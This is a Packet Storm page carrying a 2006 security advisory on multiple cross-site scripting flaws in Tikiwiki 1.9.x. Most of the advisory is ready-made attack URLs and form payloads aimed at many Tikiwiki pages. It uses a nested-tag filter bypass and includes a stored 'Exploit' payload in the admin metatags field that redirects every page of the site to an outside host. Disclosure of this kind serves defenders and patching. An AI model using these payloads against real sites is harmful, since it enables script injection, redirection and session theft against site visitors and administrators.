exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Tikiwiki1.9.x.txt

Tikiwiki1.9.x.txt
Posted May 29, 2006
Authored by Blwood | Site blwood.net

Tikiwiki 1.9.x suffers from multiple XSS vulnerabilities.

tags | advisory, vulnerability
SHA-256 | 264ce24505d5ad6a1ee2221743e2fc046e44eca7525e4458100060b10fa73c4b

Tikiwiki1.9.x.txt

Change Mirror Download
Multiple XSS Vulnerabilities in Tikiwiki 1.9.x

Discovered by Blwood
http://www.blwood.net




** Public **


-------------

Tiki-lastchanges

http://www.site.com/tiki-lastchanges.php?days=3&offset=%22%3E%3Cscr%3Cscript%3Eipt%3Ealert('Blwood')%3C/scr%3C/script%3Eipt%3E

http://www.site.com/tikiwiki-1.9.3.1/tiki-lastchanges.php?days=%22%3E%3Csc%3Cscript%3Eript%3Ealert('Blwood')%3C/scr%3C/script%3Eipt%3E&offset=0&sort_mode=user_desc

-------------

Tiki-orphan_pages.php

http://www.site.com/tikiwiki-1.9.3.1/tiki-orphan_pages.php?find=%22%3E%3Csc%3Cscript%3Eript%3Ealert('Blwood')%3C/scr%3C/script%3Eipt%3E&offset=&sort_mode=flag_desc

http://www.site.com/tikiwiki-1.9.3.1/tiki-orphan_pages.php?find=&offset=%22%3E%3Csc%3Cscript%3Eript%3Ealert('Blwood')%3C/scr%3C/script%3Eipt%3E&sort_mode=flag_desc

-------------

Tiki-listpages.php

http://www.site.com/tiki-listpages.php?offset=%22%3E%3Csc%3Cscript%3Eript%3Ealert('Blwood')%3C/scr%3C/script%3Eipt%3E&sort_mode=creator_desc

http://www.site.com/tiki-listpages.php?initial=%22%3E%3Csc%3Cscript%3Eript%3Ealert('Blwood')%3C/scr%3C/script%3Eipt%3E&sort_mode=pageName_asc

-------------

Tiki-remind_password.php

http://tikiwiki.org/tiki-remind_password.php

"><scr<script>ipt>alert('Blwood')</scr</script>ipt>

-------------


** Admin **

-------------

Tiki-admin_include_metatags.php

http://www.site.com/tiki-admin.php?page=metatags

"><sc<script>ript>alert('Blwood')</scr</script>ipt>

In all pages the source will be :

<meta name="keywords" content=""><script>alert('Blwood')</script>" />

The code will be executed in every pages !

Exploit :

"><sc<script>ript>document.location='http://www.blwood.net'</scr</script>ipt>

-------------

Tiki-admin_ressmodules.php

http://www.site.com/tiki-admin_rssmodules.php?offset=%22%3E%3Cscr%3Cscript%3Eipt%3Ealert('Blwood')%3C/scr%3C/script%3Eipt%3E%3C!--&sort_mode=name_desc&rssId=1

-------------

Tiki-syslog.php

http://www.site.com/tiki-syslog.php?find=&max=10&offset=%22%3E%3Cscr%3Cscript%3Eipt%3Ealert('Blwood')%3C/scr%3C/script%3Eipt%3E%3C!--&sort_mode=loguser_desc

http://www.site.com/tiki-syslog.php?find=&max=%22%3E%3Cscr%3Cscript%3Eipt%3Ealert('Blwood')%3C/scr%3C/script%3Eipt%3E%3C!--&offset=0&sort_mode=logtype_desc

-------------

Tiki-adminusers.php

http://www.site.com/tiki-adminusers.php?find=&search=find&numrows=%22%3E%3Cscr%3Cscript%3Eipt%3Ealert('Blwood')%3C/scr%3C/script%3Eipt%3E%3C!--&sort_mode=login_asc

In the Form :

"><scr<script>ipt>alert('Blwood')</scr</script>ipt>

-------------

Tiki-admin_hotwords.php

"><sc<script>ript>alert('Blwood')</scr</script>ipt>

-------------

Tiki-admin_modules.php

Assign new module
**********************

Parameters : "><sc<script>ript>alert('Blwood')</scr</script>ipt>


Create new user module
****************************

Name : "><sc<script>ript>alert('Blwood')</scr</script>ipt>

-------------

Tiki-admin_notifications.php

Add notification :

"><sc<script>ript>alert('Blwood')</scr</script>ipt>

http://www.site.com/tiki-admin_notifications.php?offset=%22%3E%3Csc%3Cscript%3Eript%3Ealert('Blwood')%3C/scr%3C/script%3Eipt%3E&sort_mode=object_desc

-------------

Tiki-admin_dsn.php

Name : "><sc<script>ript>alert('Blwood')</scr</script>ipt>
Dsn : "><sc<script>ript>alert('Blwood')</scr</script>ipt>

-------------

Tiki-admin_content_templates.php

http://www.site.com/tiki-admin_content_templates.php?offset=%22%3E%3Csc%3Cscript%3Eript%3Ealert('Blwood')%3C/scr%3C/script%3Eipt%3E&sort_mode=created_asc

Create new template :

name: "><sc<script>ript>alert('Blwood')</scr</script>ipt>

-------------

Tiki-admin_chat.php

http://www.site.com/tiki-admin_chat.php?offset=%22%3E%3Csc%3Cscript%3Eript%3Ealert('Blwood')%3C/scr%3C/script%3Eipt%3E&sort_mode=name_desc&channelId=1

-------------
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close